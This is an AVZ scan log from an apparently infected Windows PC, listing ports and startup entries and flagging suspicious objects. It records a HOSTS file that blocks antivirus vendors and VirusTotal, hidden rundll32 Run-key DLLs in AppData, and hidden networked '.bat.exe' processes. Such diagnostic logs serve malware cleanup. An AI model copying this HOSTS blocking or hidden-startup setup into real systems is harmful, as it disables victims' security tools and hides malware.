3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53775LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
53832LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
54010LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
54027LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
54128LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
54177LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
54335LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
54482LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
54652LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
55117LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
55193LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
55497LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
55656LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
55790LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
55884LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
55924LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
55998LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
56036LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
56195LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
57065LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
57740LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
58952LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
59048LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
59071LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
59323LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
59402LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
59803LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
61313LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
61417LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
61446LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
61641LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
61652LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
61972LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
62370LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
62406LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
62558LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
62868LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
62909LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
62988LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
63034LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
63445LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
63568LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
64150LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
64212LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
64424LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
64567LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
64669LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
64783LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
64801LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
64861LISTENING----c:\program files (x86)\google\chrome\application\chrome.exe [24832]
3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14
Script: Quarantine, Delete, Delete via BC, Terminate
x64 Google ChromeCopyright 2023 Google LLC. All rights reserved.
49301LISTENING----c:\program files\common files\apple\mobile device support\applemobiledeviceservice.exe [6140]
100.84 kb, rsAh, created: 08.10.2022 03:00:46, modified: 08.10.2022 03:00:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64OnLine keyLoggerMobileDeviceService© 2022 Apple Inc. All rights reserved.
49302LISTENING----c:\program files\common files\apple\mobile device support\applemobiledeviceservice.exe [6140]
100.84 kb, rsAh, created: 08.10.2022 03:00:46, modified: 08.10.2022 03:00:46
Script: Quarantine, Delete, Delete via BC, Terminate
x64 MobileDeviceService© 2022 Apple Inc. All rights reserved.
137LISTENING----System [4]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64Microsoft NET  
138LISTENING----System [4]
error getting file info
Script: Quarantine, Delete, Delete via BC, Terminate
x64Microsoft NET  
27036LISTENING----c:\program files (x86)\steam\steam.exe [13792]
4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18
Script: Quarantine, Delete, Delete via BC, Terminate
x64 SteamCopyright (C) 2021 Valve Corporation
Items found - 862, recognized as trusted - 50

Downloaded Program Files (DPF)

File name Redirector Description Manufacturer CLSID Source URL
Items found - 0, recognized as trusted - 0

Control Panel Applets (CPL)

File name Redirector Description Manufacturer
Items found - 34, recognized as trusted - 34

Active Setup

File name Redirector Description Manufacturer CLSID
C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.248\Installer\chrmstp.exe
5066.77 kb, rsAh, created: 20.07.2023 20:42:27, modified: 20.07.2023 20:42:20
Script: Quarantine, Delete, Delete via BC
x64Google Chrome InstallerCopyright 2023 Google LLC. All rights reserved.{8A69D345-D564-463c-AFF1-A69D9E530F96}
Delete
C:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\Installer\setup.exe
3577.91 kb, rsAh, created: 23.07.2023 03:50:06, modified: 23.07.2023 03:49:58
Script: Quarantine, Delete, Delete via BC
x64Microsoft Edge InstallerCopyright Microsoft Corporation. All rights reserved.{9459C573-B17A-45AE-9F64-1857B5D58CEE}
Delete
C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.248\Installer\chrmstp.exe
5066.77 kb, rsAh, created: 20.07.2023 20:42:27, modified: 20.07.2023 20:42:20
Script: Quarantine, Delete, Delete via BC
x64Google Chrome InstallerCopyright 2023 Google LLC. All rights reserved.{8A69D345-D564-463c-AFF1-A69D9E530F96}
Delete
C:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\Installer\setup.exe
3577.91 kb, rsAh, created: 23.07.2023 03:50:06, modified: 23.07.2023 03:49:58
Script: Quarantine, Delete, Delete via BC
x64Microsoft Edge InstallerCopyright Microsoft Corporation. All rights reserved.{9459C573-B17A-45AE-9F64-1857B5D58CEE}
Delete
Items found - 22, recognized as trusted - 18

HOSTS file

Hosts file record
0.0.0.0       avast.com
0.0.0.0       www.avast.com
0.0.0.0       totalav.com
0.0.0.0       www.totalav.com
0.0.0.0       scanguard.com
0.0.0.0       www.scanguard.com
0.0.0.0       totaladblock.com
0.0.0.0       www.totaladblock.com
0.0.0.0       pcprotect.com
0.0.0.0       www.pcprotect.com
0.0.0.0       mcafee.com
0.0.0.0       www.mcafee.com
0.0.0.0       bitdefender.com
0.0.0.0       www.bitdefender.com
0.0.0.0       us.norton.com
0.0.0.0       www.us.norton.com
0.0.0.0       avg.com
0.0.0.0       www.avg.com
0.0.0.0       malwarebytes.com
0.0.0.0       www.malwarebytes.com
0.0.0.0       pandasecurity.com
0.0.0.0       www.pandasecurity.com
0.0.0.0       surfshark.com
0.0.0.0       www.surfshark.com
0.0.0.0       avira.com
0.0.0.0       www.avira.com
0.0.0.0       norton.com
0.0.0.0       www.norton.com
0.0.0.0       eset.com
0.0.0.0       www.eset.com
0.0.0.0       zillya.com
0.0.0.0       www.zillya.com
0.0.0.0       kaspersky.com
0.0.0.0       www.kaspersky.com
0.0.0.0       usa.kaspersky.com
0.0.0.0       www.usa.kaspersky.com
0.0.0.0       dpbolvw.net
0.0.0.0       www.dpbolvw.net
0.0.0.0       sophos.com
0.0.0.0       www.sophos.com
0.0.0.0       home.sophos.com
0.0.0.0       www.home.sophos.com
0.0.0.0       www.adaware.com
0.0.0.0       adaware.com
0.0.0.0       www.ahnlab.com
0.0.0.0       ahnlab.com
0.0.0.0       www.bullguard.com
0.0.0.0       bullguard.com
0.0.0.0       clamav.net
0.0.0.0       www.clamav.net
0.0.0.0       www.drweb.com
0.0.0.0       drweb.com
0.0.0.0       emsisoft.com
0.0.0.0       www.emsisoft.com
0.0.0.0       www.f-secure.com
0.0.0.0       f-secure.com
0.0.0.0       www.zonealarm.com
0.0.0.0       zonealarm.com
0.0.0.0       www.trendmicro.com
0.0.0.0       trendmicro.com
0.0.0.0       www.ccleaner.com
0.0.0.0       ccleaner.com
0.0.0.0       www.virustotal.com
0.0.0.0       virustotal.com
Clear Hosts file

Protocols and handlers

File name Redirector Type Description Manufacturer CLSID
Items found - 44, recognized as trusted - 44

Shared resources

Network name Path Notes
C$C:\Default share
D$D:\Default share
ADMIN$C:\WINDOWSRemote Admin
IPC$ Remote IPC

Background Intelligent Transfer Service (BITS) Jobs

BITS Job ID Job name Status Source URL or file name Destination file name Notification program
{890FA351-9F8E-4556-A468-AC6340F97EC9}Edge Component UpdaterTRANSFERREDhttp://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/ec243c2e-e29f-46d6-92ef-c60f8cfa76e0?P1=1690605975&P2=404&P3=2&P4=QZbQ8%2ffl7n7jU6O0Ny0oQUazYtvtJjyw9ch5ZKSqDw4Z9mZUZhlemBPBsqRU1q6KDUXTB%2bvPPnvZ6Fp%2f%2bNbf%2fw%3d%3dC:\Users\Isaac\AppData\Local\Temp\edge_BITS_19964_1722601826\ec243c2e-e29f-46d6-92ef-c60f8cfa76e0 
 

Suspicious objects

FileRedirectorDescriptionType
c:\users\isaac\appdata\roaming\1000071060\rwfacade.dll
1302.60 kb, rsAh, created: 05.03.2023 23:25:56, modified: 05.03.2023 23:25:57
Script: Quarantine, Delete, Delete via BC
x32Suspicion by Heuristic analysis HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rwfacade.dll
c:\users\isaac\appdata\roaming\1000072060\rlmp32wlve.dll
1190.61 kb, rsAh, created: 05.03.2023 23:25:57, modified: 05.03.2023 23:25:58
Script: Quarantine, Delete, Delete via BC
x32Suspicion by Heuristic analysis HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rlmp32wlve.dll
c:\users\isaac\appdata\roaming\1000079060\rlmp32wce.dll
14310.47 kb, rsAh, created: 19.03.2023 20:54:11, modified: 19.03.2023 20:57:05
Script: Quarantine, Delete, Delete via BC
x32Suspicion by Heuristic analysis HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rlmp32wce.dll
c:\users\isaac\appdata\roaming\1000107060\ntredirect.dll
19455.50 kb, rsAh, created: 02.04.2023 17:53:25, modified: 02.04.2023 17:58:52
Script: Quarantine, Delete, Delete via BC
x32Suspicion by Heuristic analysis HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntredirect.dll


Attention !!! Database was last updated 3/14/2023 it is necessary to update the database (via File - Database update)
AVZ Toolkit log; AVZ version is 5.67 private build [14.03.2023  5:00:04]
Scanning started at 23.07.2023 13:29:18
Database loaded: signatures - 9995, NN profile(s) - 2, malware removal microprograms - 23, signature database released 14.03.2023 04:00
Heuristic microprograms loaded: 417
PVS microprograms loaded: 10
Digital signatures of system files loaded: 654627
Heuristic analyzer mode: Maximum heuristics mode
Malware removal mode: disabled
Windows version is: 10.0.22621,  "Windows 10 Home" (Windows 10 Home) x64, install date 23.07.2023 02:52:51 ; AVZ is run with administrator rights (+)
System Restore: enabled
1. Searching for Rootkits and other software intercepting API functions
1.1 Searching for user-mode API hooks
 Analysis: kernel32.dll, export table found in section .rdata
 Analysis: ntdll.dll, export table found in section .text
 Analysis: user32.dll, export table found in section .text
 Analysis: advapi32.dll, export table found in section .text
 Analysis: ws2_32.dll, export table found in section .text
 Analysis: wininet.dll, export table found in section .text
 Analysis: rasapi32.dll, export table found in section .text
 Analysis: urlmon.dll, export table found in section .text
 Analysis: netapi32.dll, export table found in section .text
1.4 Searching for masking processes and drivers
 Checking not performed: extended monitoring driver (AVZPM) is not installed
2. Scanning RAM
 Number of processes found: 256
Extended process analysis: 4412 C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
Extended process analysis: 15860 C:\Users\Isaac\AppData\Roaming\tDSul.bat.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Loads RASAPI DLL - may use dialing ?
Extended process analysis: 16056 C:\Users\Isaac\AppData\Roaming\kKGAC.bat.exe
[ES]:Program code includes networking-related functionality
[ES]:Listens on HTTP ports !
[ES]:Application has no visible windows
Extended process analysis: 16716 C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\EasyTuneEngineService.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
Extended process analysis: 13932 C:\Users\Isaac\AppData\Roaming\tMaIE.bat.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Loads RASAPI DLL - may use dialing ?
Extended process analysis: 20272 C:\Program Files (x86)\GIGABYTE\SmartSurvey\GbtCareBotService.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Loads RASAPI DLL - may use dialing ?
Extended process analysis: 23568 C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
Extended process analysis: 25520 C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe
[ES]:Program code includes networking-related functionality
[ES]:Application has no visible windows
[ES]:Loads RASAPI DLL - may use dialing ?
 Number of modules loaded: 347
Scanning RAM - complete
3. Scanning disks
4. Checking  Winsock Layered Service Provider (SPI/LSP)
 LSP settings checked. No errors detected
5. Searching for keyboard/mouse/windows events hooks (Keyloggers, Trojan DLLs)
 Checking - disabled by user
6. Searching for opened TCP/UDP ports used by malicious software
 Checking - disabled by user
7. Heuristic system check
Non-standard registry key for system service: wuauserv ImagePath=""
>>> c:\users\isaac\appdata\roaming\1000071060\rwfacade.dll HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rwfacade.dll
Hidden startup suspected:  HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rwfacade.dll="rundll32 C:\Users\Isaac\AppData\Roaming\1000071060\rwfacade.dll, rundll"
>>> c:\users\isaac\appdata\roaming\1000072060\rlmp32wlve.dll HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rlmp32wlve.dll
Hidden startup suspected:  HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rlmp32wlve.dll="rundll32 C:\Users\Isaac\AppData\Roaming\1000072060\rlmp32wlve.dll, Entry"
>>> c:\users\isaac\appdata\roaming\1000079060\rlmp32wce.dll HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rlmp32wce.dll
Hidden startup suspected:  HKCU\Software\Microsoft\Windows\CurrentVersion\Run\rlmp32wce.dll="rundll32 C:\Users\Isaac\AppData\Roaming\1000079060\rlmp32wce.dll, Entry"
>>> c:\users\isaac\appdata\roaming\1000107060\ntredirect.dll HSC: suspicion for Hidden startup suspected: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntredirect.dll
Hidden startup suspected:  HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntredirect.dll="rundll32 C:\Users\Isaac\AppData\Roaming\1000107060\ntredirect.dll, Entry"
Checking - complete
8. Searching for vulnerabilities
>> Services: potentially dangerous service allowed: TermService (Remote Desktop Services)
> Services: please bear in mind that the set of services depends on the use of the PC (home PC, office PC connected to corporate network, etc)!
>> Security: disk drives' autorun is enabled
>> Security: administrative shares (C$, D$ ...) are enabled
>> Security: anonymous user access is enabled
>> Security: sending Remote Assistant queries is enabled
Checking - complete
9. Troubleshooting wizard
 >>  HDD autorun is allowed
 >>  Network drives autorun is allowed
 >>  Removable media autorun is allowed
Checking - complete
Files scanned: 603, extracted from archives: 0, malicious software found 0, suspicions - 0
Scanning finished at 23.07.2023 13:30:43
Time of scanning: 00:01:25
System Analysis in progress
Network diagnostics
 DNS and Ping test
  Host="yandex.ru", IP="5.255.255.70,5.255.255.77,77.88.55.60,77.88.55.88", Ping=OK (0,157,5.255.255.70)
  Host="google.ru", IP="172.217.4.35", Ping=OK (0,18,172.217.4.35)
  Host="google.com", IP="142.250.190.14", Ping=OK (0,20,142.250.190.14)
  Host="www.kaspersky.com", IP="0.0.0.0", Ping=Error (-1,0,0.0.0.0)
  Host="www.kaspersky.ru", IP="144.121.3.166", Ping=Error (11010,0,0.0.0.0)
  Host="dnl-03.geo.kaspersky.com", IP="4.28.136.54", Ping=OK (0,36,4.28.136.54)
  Host="dnl-11.geo.kaspersky.com", IP="38.117.98.253", Ping=OK (0,44,38.117.98.253)
  Host="activation-v2.kaspersky.com", IP="4.59.181.141", Ping=Error (11010,0,0.0.0.0)
  Host="odnoklassniki.ru", IP="5.61.23.11,217.20.155.13,217.20.147.1", Ping=OK (0,161,5.61.23.11)
  Host="vk.com", IP="87.240.132.67,87.240.132.72,87.240.132.78,87.240.137.164,93.186.225.194,...", Ping=OK (0,134,87.240.132.67)
  Host="vkontakte.ru", IP="87.240.132.78,87.240.137.164,93.186.225.194,87.240.129.133,87.240.132.72,...", Ping=OK (0,131,87.240.132.78)
  Host="twitter.com", IP="104.244.42.65", Ping=OK (0,39,104.244.42.65)
  Host="facebook.com", IP="31.13.93.35", Ping=OK (0,26,31.13.93.35)
  Host="ru-ru.facebook.com", IP="31.13.93.19", Ping=OK (0,24,31.13.93.19)
 Network IE settings
  IE setting AutoConfigURL=
  IE setting AutoConfigProxy=
  IE setting ProxyOverride=*.local
  IE setting ProxyServer=
  IE setting Internet\ManualProxies=
 Network TCP/IP settings
  Interface: "Ethernet"
   IPAddress = "192.168.0.152"
   DHCPIPAddress = "192.168.0.152"
   SubnetMask = "255.255.255.0"
   DHCPSubnetMask = "255.255.255.0"
   DefaultGateway = ""
   NameServer = ""
   Domain = ""
   DhcpServer = "192.168.0.1"
 Network Persistent Routes

System Analysis - complete
Script commands
Add commands to script:
Additional operations:
File list